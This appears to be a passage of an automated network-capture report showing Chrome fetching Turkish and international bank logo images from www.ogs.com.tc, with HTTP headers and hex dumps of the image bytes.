2024-05-25 22:17:17 UTC	16100	IN	Data Raw: ff d8 ff e1 0a 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 33 34 3a 33 34 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ZExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:34:34"
2024-05-25 22:17:17 UTC	8836	IN	Data Raw: 2a cd d2 20 6e c7 29 4a a1 4a 72 c9 59 25 a2 61 a8 3c 9c c6 d6 86 ae f2 07 32 88 5d 73 43 95 d4 bb 77 26 ae e9 54 52 3e 5d cc 80 50 af 3f 66 bb 04 9b 38 55 67 51 4f da b8 66 aa 8b 90 8d dd bb fe b2 78 d7 b3 69 78 75 a2 37 91 79 6c 45 ca d9 95 5a e6 29 36 79 2c f6 cd 5e d0 ab f2 55 b3 d8 e0 1c b2 99 61 18 fe cb 23 14 ba a2 d9 74 54 39 da 90 a2 6f 01 31 4c f6 cd 75 b3 58 6e 16 49 35 3d 59 1b 05 a6 6a 4a c1 39 20 a8 88 8f a8 f6 5a 59 cb b7 ee d4 11 11 f7 a8 a1 87 df d0 4f bf a5 5b 58 c1 09 0a a0 4d 3c ad cc b6 89 14 cf e2 24 50 24 56 64 46 62 43 01 83 b0 f9 f6 1e e1 d3 49 28 c7 8e e3 a4 63 dc a2 f1 84 83 07 0b 34 7a c9 e3 65 0a b3 77 4d 1d 37 3a 6b b6 72 dd 52 01 88 72 18 a6 21 80 04 04 04 3a cb fe 5f fc db d3 67 b6 4c ab 68 97 63 9e e1 7a be 87 2a e6 77 45 Data Ascii: * n)JJrY%a<2]sCw&TR>]P?f8UgQOfxixu7ylEZ)6y,^Ua#tT9o1LuXnI5=YjJ9 ZYO[XM<$P$VdFbCI(c4zewM7:krRr!:_gLhcz*wE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49765	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	368	OUT	GET /assets/images/banks/akbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 3052 Last-Modified: Thu, 23 May 2024 21:37:06 GMT Connection: close ETag: "664fb702-bec" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	3052	IN	Data Raw: 52 49 46 46 e4 0b 00 00 57 45 42 50 56 50 38 20 d8 0b 00 00 90 47 00 9d 01 2a f4 01 c8 00 3e 49 24 8c 46 22 a2 21 21 24 71 f0 50 09 09 65 6e e1 76 b1 1b 10 1f dd ff 20 3b fa 28 07 4a fc 80 fc c6 f9 81 a6 ff 45 fb fb fb c9 fe cb e2 af 6a 7c ab e6 e3 c4 7f dc 3f 30 bf b1 7f ff ff ff f3 4f f9 cf e4 37 c9 7f b7 2f 70 0f d1 cf f1 9f db 7f 6a 7f c1 ff ff ff ff e0 63 cc 07 ed 1f ed 0f bc bf f7 3f f8 1f d5 7d cb 7a 00 7f 3a fe c7 ff c3 b0 3b d0 03 f6 cf ff ff b3 7f fa af fa 5f ef 3f 7f fe 8f 3f ae 7f 96 ff c5 fe d3 da 0b fe 8f 58 07 09 8f f7 2f c6 cf 09 bf c2 63 ba 81 07 dd 1f d0 fe 42 72 03 af ae f4 a5 d2 f8 50 7f 2d e9 26 94 d9 a2 ff de f3 73 f5 70 4b af 2e 08 5e a5 09 28 89 e7 17 97 04 2f 52 84 94 44 f3 8b cb 82 17 a9 42 4a 22 79 c5 e5 c1 0b d4 a1 25 11 3c e2 Data Ascii: RIFFWEBPVP8 G*>I$F"!!$qPenv ;(JEj\|?0O7/pjc?}z:;_??X/cBrP-&spK.^(/RDBJ"y%<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	367	OUT	GET /assets/images/banks/deniz.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 5774 Last-Modified: Thu, 23 May 2024 21:37:10 GMT Connection: close ETag: "664fb706-168e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	5774	IN	Data Raw: 52 49 46 46 86 16 00 00 57 45 42 50 56 50 38 20 7a 16 00 00 f0 68 00 9d 01 2a f4 01 c8 00 3e 49 22 8f 45 a2 a2 21 11 58 7c d4 28 04 84 b2 b7 70 bb 00 88 cb 8f f4 bd 84 57 87 c4 7f 6a fd cb f6 b3 b0 bf 74 fc 69 ec cb fb 77 60 f1 a4 eb 0b f6 3f dd bf 76 bf cc 7b f8 ff 4f fd 83 dc d7 e9 0f 60 2f d4 1f f8 3f e0 ff c7 7e b7 f7 3b fd ae f5 05 fa e7 ff 2b fb f7 bb 0f f8 df d9 9f 73 3f b3 df b3 3f 00 1f cd bf d4 75 89 7e e9 7b 07 fe da 7f ff f5 c8 fd b4 f8 4e fe b9 ff 0f f7 03 da 73 ff 07 b0 06 f9 a7 8f ff b3 7e 3e 78 1f fd 57 f2 7b b1 83 d8 9e d3 f3 0c ea 2f 34 bf 8c 7d 74 fc 2f f5 6f da 8f ca 2e 76 78 02 fe 2b fc b7 fc 4f f5 bf da 7f ec 9f b8 7c 95 9a f7 98 17 b2 bf 4e ff 5d f7 07 e9 8f a9 f7 7b 3d 80 bf 99 7f 5a ff 37 eb 9f fa ff 09 2a 00 7f 2e fe e3 ff 23 ee Data Ascii: RIFFWEBPVP8 zh>I"E!X\|(pWjtiw`?v{O`/?~;+s??u~{Ns~>xW{/4}t/o.vx+O\|N]{=Z7.#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49766	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	370	OUT	GET /assets/images/banks/albaraka.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 36270 Last-Modified: Thu, 23 May 2024 21:37:07 GMT Connection: close ETag: "664fb703-8dae" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	16100	IN	Data Raw: ff d8 ff e1 0b d3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 32 30 3a 31 39 3a 32 37 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 20:19:27"
2024-05-25 22:17:18 UTC	16384	IN	Data Raw: 8d 65 3a d4 b4 37 68 39 09 34 8b bd 73 b1 6a bb b3 0b 8c ad 9e 3c d2 42 f5 67 6b 6e 91 37 9b b5 6d fe f1 ef a5 1f a4 df 90 c7 d1 97 cc 00 a4 83 76 c1 0c 53 14 c5 29 80 9d f0 24 28 88 14 a1 06 30 10 26 4c 13 8c 83 04 08 01 80 24 cb e6 02 58 9d fb 72 3c 4d d9 12 8d d4 53 10 a6 10 95 2c b0 02 03 15 11 23 b6 77 ed c4 93 c0 80 08 10 7e 99 c4 39 80 c9 20 c0 04 b2 88 f8 7b 09 95 2d f1 1a a1 c6 fc 94 47 e4 42 5b 8c c9 b2 a4 ca ce cc b0 b5 39 66 f8 02 cc 31 20 67 1c 63 98 f3 fa 87 e3 f5 0f 00 22 03 f5 66 47 d5 99 1f 56 67 b0 13 8e 00 69 a7 30 01 84 a2 33 0e 20 53 18 b0 33 0e 21 00 22 02 13 e6 04 18 e6 34 14 e6 2c 18 c6 34 14 e6 2c 09 cc 60 80 11 01 fa b3 20 c6 31 a0 b3 0e 58 19 d3 06 39 8f 3f ab 33 da 4e 29 14 09 0b d3 4b b3 2a da 3a 6a 1c fb c5 da c9 2b 3d 90 31 Data Ascii: e:7h94sj<Bgkn7mvS)$(0&L$Xr<MS,#w~9 {-GB[9f1 gc"fGVgi03 S3!"4,4,` 1X9?3N)K*:j+=1
2024-05-25 22:17:18 UTC	3786	IN	Data Raw: 48 ec 12 90 4d 73 8a cb 9f 61 f8 3a 68 d9 ea 80 c1 76 9b 25 bd b6 00 66 e9 19 ce 30 a3 39 f5 bc b3 a8 b0 8d 18 47 b1 b7 b2 98 df 94 b2 40 b4 5d 68 8c 4a e8 a8 08 cd 08 c7 b0 e3 3e 40 a4 95 9c db e0 b4 76 f9 3d 55 1c ce d5 3d 65 ed 14 e3 57 d8 c5 52 0d 5c 19 02 64 80 3b d3 30 dc e1 18 6a d7 8d ce 63 9a e5 b3 f6 17 c9 d7 4a e9 70 07 77 b5 f6 f1 3e c2 42 2b 8f 5e df 56 df 77 c6 11 dc 47 a3 9e 48 0e 53 df d6 8d ad 7b 94 2e b3 47 3d ac 0c 71 f8 f6 a1 95 29 a4 a6 66 0e 03 91 b4 10 a3 fa 8e 48 84 bd b5 d1 50 57 59 99 42 9d 1a f9 21 af a6 88 d4 73 ba ab 5a 45 46 f4 ee 77 5f 6a d9 2e 62 8b 4f 61 83 b8 e4 d8 e2 99 53 a0 00 e5 d2 de 68 23 53 5b cd c3 50 59 42 3a 3a 35 84 5b ed d4 6a d8 6e 8a 66 bc 32 bd 7f 48 8c 7b 1e e6 a8 c2 11 b0 41 13 18 21 08 4c 68 c6 21 8d a8 Data Ascii: HMsa:hv%f09G@]hJ>@v=U=eWR\d;0jcJpw>B+^VwGHS{.G=q)fHPWYB!sZEFw_j.bOaSh#S[PYB::5[jnf2H{A!Lh!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49762	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	369	OUT	GET /assets/images/banks/anadolu.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 20736 Last-Modified: Thu, 23 May 2024 21:37:09 GMT Connection: close ETag: "664fb705-5100" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	16100	IN	Data Raw: ff d8 ff e1 08 61 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 32 30 3a 30 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: aExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:20:05"
2024-05-25 22:17:18 UTC	4636	IN	Data Raw: 69 f1 f6 8f 26 d3 0d a9 d8 57 69 aa da ff 00 75 47 4a ac 1d b4 03 11 3e c5 41 cd 1f d9 f6 a2 af f0 fe a6 9f dd 8f 0c ff 00 ba ef bf c5 f1 d3 63 7a 52 48 ba d1 71 5e 6b 67 6d 28 c6 71 cd 32 c8 f9 1a a5 9b 34 e6 72 23 88 69 b2 51 c5 7a af fd 27 af ab 6d 05 ec f8 b5 54 94 55 b3 ae 6e 2d 26 95 a0 85 5b 55 59 14 b3 6c 27 cb 33 fd 9a 18 b0 e2 01 e4 23 97 ec 6b 1a ab ea 26 aa f2 1d 9d b6 03 a9 79 09 63 d4 b4 c0 38 ca f4 a4 f1 cf 91 3d 93 e8 f3 f6 4e 33 4a 90 05 27 01 94 ab cf b5 ee 6a 35 26 ce 1a 7c 51 5e 89 eb 27 e5 9f 34 69 68 45 d9 05 cf fc 86 c2 5f 47 19 99 0e b3 b0 72 9b 1a 8a 5d 54 31 3f d8 6d 24 d8 b6 b9 ca 9b a9 2d 63 95 3d ae 9b ee a9 f2 54 4e 2b e4 36 35 e3 fc b9 d9 39 ae 47 a0 41 8c c2 7d 57 55 97 45 4f 16 6d 95 14 97 fb 22 a4 fc fd a3 cd 06 4b 57 ed Data Ascii: i&WiuGJ>AczRHq^kgm(q24r#iQz'mTUn-&[UYl'3#k&yc8=N3J'j5&\|Q^'4ihE_Gr]T1?m$-c=TN+659GA}WUEOm"KW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49768	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	601	OUT	GET /assets/images/banks/hsbc.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:18 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 33055 Last-Modified: Thu, 23 May 2024 21:37:15 GMT Connection: close ETag: "664fb70b-811f" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:18 UTC	16100	IN	Data Raw: ff d8 ff e1 0b 10 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 31 3a 35 36 3a 30 32 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 01:56:02"
2024-05-25 22:17:18 UTC	16384	IN	Data Raw: 82 bd f1 2a e5 65 99 fb 3f b7 25 24 8e 17 68 7c 43 ac 61 6a 54 df c5 cd 9a 57 18 f2 b8 90 2c ed 79 60 64 9b cf 1c 9a 2e 99 cb 1e ea 07 33 23 08 c4 7a b0 07 01 24 ce 61 bd a1 e0 ed 9d 09 f1 94 44 ec 1d 5a 07 96 88 98 38 60 07 19 74 7a f3 96 d9 69 0b 60 80 e7 c7 c6 8a 99 a7 04 3d cc 19 1b 23 24 17 28 1c 36 1c cb 74 97 de 7c 92 94 a5 43 5c 14 38 ab 8a d4 ee 3d 13 9e 09 20 83 b6 3f 29 ea 34 77 40 7b 09 8c 15 cb 25 17 69 7c 4d 2a 0a 0b 13 63 88 74 76 37 45 a5 0e 47 5c 6a 70 bf 6c e4 8a e5 56 f6 29 b2 55 8c d0 dd 18 94 1c c6 84 76 5c f0 fa 76 ec c7 5c 88 38 bf f8 f9 87 bc 52 6d 01 87 6a 6d 76 bf 01 d1 22 d1 2f be 5e 5e 5e 5e 58 7c 71 78 c5 24 6a c0 a1 6c a1 60 57 bb aa 3f b2 fa 35 42 af 0d 55 99 b5 a6 40 9c 7f 80 a2 27 60 ea d0 3c b3 c4 c1 c3 00 38 c7 47 af 29 Data Ascii: e?%$h\|CajTW,y`d.3#z$aDZ8`tzi`=#$(6t\|C\8= ?)4w@{%i\|Mctv7EG\jplV)Uv\v\8Rmjmv"/^^^^X\|qx$jl`W?5BU@'`<8G)
2024-05-25 22:17:18 UTC	571	IN	Data Raw: b7 ab 98 d4 42 80 e2 55 6b c6 41 bd ad 20 4c 37 30 d1 cc c6 14 4f 61 18 d7 22 ee b0 a3 b6 d9 f6 b3 b6 ba 70 71 bb 03 31 d2 ed 30 36 b2 dc 43 87 8f b7 e6 08 da c6 4e 10 d8 e4 ad b2 56 b0 36 80 1a ff 00 42 43 0a 24 26 1b 0c 5a 8d a7 74 db 5a 82 17 1b 8d 33 db 2e b3 05 59 2d a4 08 79 07 90 00 12 34 82 80 22 35 cb 5b 5c ae 61 ed 4e c5 fe 84 76 14 ad d4 72 5f 25 ea 2d f6 9b cd a5 bc ab dd 46 a2 f6 53 a5 da 5b da 4b 72 29 0e 72 2a 35 82 10 d8 d6 8c 21 1b 58 08 e0 63 04 26 30 6c 6b 53 f0 55 bc 11 ce d6 56 ba 4e d5 34 b6 aa 91 65 2a 49 b3 b8 e0 eb 9b 49 2a f9 3a 3c e4 66 21 a5 4d c4 4e 94 65 2d bd 40 91 cf 1b dc f9 b0 98 b2 3e 22 3c ee c2 72 fc 03 5c fe 5a ba e5 be 32 d6 af 1c 83 12 68 d7 51 b5 91 6e f4 34 53 eb ad 2a ec 63 19 d5 ce a4 7d 6b be 2c 93 9e 56 43 04 Data Ascii: BUkA L70Oa"pq106CNV6BC$&ZtZ3.Y-y4"5[\aNvr_%-FS[Kr)r5!Xc&0lkSUVN4eII:<f!MNe-@>"<r\Z2hQn4Sc}k,VC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49763	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	372	OUT	GET /assets/images/banks/alternatif.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 46102 Last-Modified: Thu, 23 May 2024 21:37:08 GMT Connection: close ETag: "664fb704-b416" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	16100	IN	Data Raw: ff d8 ff e1 0b f3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 31 39 3a 31 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:19:10"
2024-05-25 22:17:17 UTC	16384	IN	Data Raw: d2 2b 42 e1 d1 22 73 68 a6 4a d7 1d b0 e3 9e 68 7f 4e 9f 8a b2 30 89 7c 49 98 c6 31 8b 87 22 29 5d bf f5 4a ac c8 cb 52 32 b9 cf 80 98 65 46 7c 7f af 48 13 33 28 2f e8 e4 41 10 05 58 be 8a d9 97 4e dd 97 38 40 2f 5d fc 81 1c 59 39 a9 ff 00 19 bb 92 6e 5c 73 dc a3 ee 4a d2 69 b7 e5 db fd ee f2 31 da bc f7 2c e5 6d 84 ad 9b 89 b3 d8 a4 d4 6b 9d b6 ea 47 d9 ed 60 87 d6 fe 44 b0 ce e7 1a 66 8b 60 8b 77 28 e1 c5 ad 5a 9f 6b af 6c c7 28 5c 56 9d f8 ef 42 c2 68 6d 6d 04 c9 b1 da 44 6e 5d a3 c6 37 b0 ef 2d eb 0a 7c 83 dd fb c7 d4 6f 62 a7 39 0e 38 7b c1 8f 97 04 85 61 26 ef a4 b5 96 5c 7a 98 ea 90 f7 5b 06 eb 19 dd 61 e4 c7 be 83 9a 1f d3 a7 a1 8b 1e ba a4 6d c3 2a 9d b3 35 44 bb 58 b5 9e 39 d7 be 9c 15 df 66 65 26 44 9b 28 ff 00 a7 24 5d 8e 85 5c cb 1d b9 6a 6a Data Ascii: +B"shJhN0\|I1")]JR2eF\|H3(/AXN8@/]Y9n\sJi1,mkG`Df`w(Zkl(\VBhmmDn]7-\|ob98{a&\z[am*5DX9fe&D($]\jj
2024-05-25 22:17:18 UTC	13618	IN	Data Raw: 31 1f 27 1a 05 4e e0 2f b3 c2 cf d8 8b c9 5f e5 8e 6f fb 35 22 54 11 14 55 22 55 44 44 44 4e aa aa ab ec 88 89 eb 67 e2 7f 87 5b 4b 1c 8f 00 e5 a7 59 64 f9 2b 96 72 f3 5c 81 a2 e6 bb fa d9 87 0e e6 a3 27 79 0c c6 55 4f 15 d7 4b 8a 6c 24 a8 ae 03 ba 05 43 24 3f a1 50 47 f1 1c 35 c3 d9 0b 1d b7 24 f2 25 f4 6c e6 3b 27 4e 2d a4 ab 4b 49 48 4e 38 e3 d2 1e 26 e2 d7 56 57 44 6d c9 53 e7 48 30 8d 0a 23 2e 3e f1 8b 60 45 ea 93 90 3c 88 a6 cc 79 23 e4 8c 88 71 e5 58 d9 68 ea c2 df 8a f8 ee 79 a9 b8 ed 67 1b e4 ee 63 23 13 9c 8a 24 0d 1d c5 a3 0e 4d 90 4d ab 8c b7 0c 0c 99 f4 cc 38 51 a3 c3 89 1c 11 b6 22 c5 65 b8 f1 d8 6d 3e e0 65 86 44 1a 6c 13 af dc 28 89 fb 8e f7 8c 73 d6 83 0b 90 7c a8 ba 4e 20 a8 06 9e ec 9b 1f 0b f4 e9 6b ca 36 cd 00 aa 3a 51 bf 57 00 2a dc Data Ascii: 1'N/_o5"TU"UDDDNg[KYd+r\'yUOKl$C$?PG5$%l;'N-KIHN8&VWDmSH0#.>`E<y#qXhygc#$MM8Q"em>eDl(s\|N k6:QW*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49767	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:17 UTC	368	OUT	GET /assets/images/banks/ziraat.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:17 UTC	282	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:17 GMT Content-Type: image/jpeg Content-Length: 3510 Last-Modified: Thu, 23 May 2024 21:37:21 GMT Connection: close ETag: "664fb711-db6" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:17 UTC	3510	IN	Data Raw: 52 49 46 46 ae 0d 00 00 57 45 42 50 56 50 38 20 a2 0d 00 00 b0 52 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 35 b8 d8 50 09 09 67 6e e1 76 b1 1f c8 1a 4b e6 4f 7d 1f 08 77 67 6e 3a 74 f2 7c e2 6f ed 5f 95 5f e7 3b 48 f9 80 7e 92 7f 83 fc aa ed 01 e6 03 f6 1f f5 df da 1b fd 1f f6 ef 70 1f a7 9f e7 7d c0 3f 52 7a c2 fd 03 3f 5b 7d 34 7f 61 fe 0d ff 64 ff 6b be 01 bf 58 7e ff f6 50 bc bf fd e3 b5 5f ec 3f 92 fe 7f f8 9c f0 cf b0 9f 8b ff 11 d9 93 eb 7f e4 4f 53 bf 91 fd 7a fb d7 e5 d7 e5 47 c9 5f e4 7c 1b f8 e1 fc f7 a8 47 e3 1f c7 ff b5 fe 5a fe 58 71 dd 69 1e 60 5e bd 7c f7 fd 27 f7 bf 1c ad 4d 7b ed ec 01 fc bb fa 4f fa de 41 ef 2a f6 02 fe 89 fe 03 f5 e3 dd 8b fb 3f fd 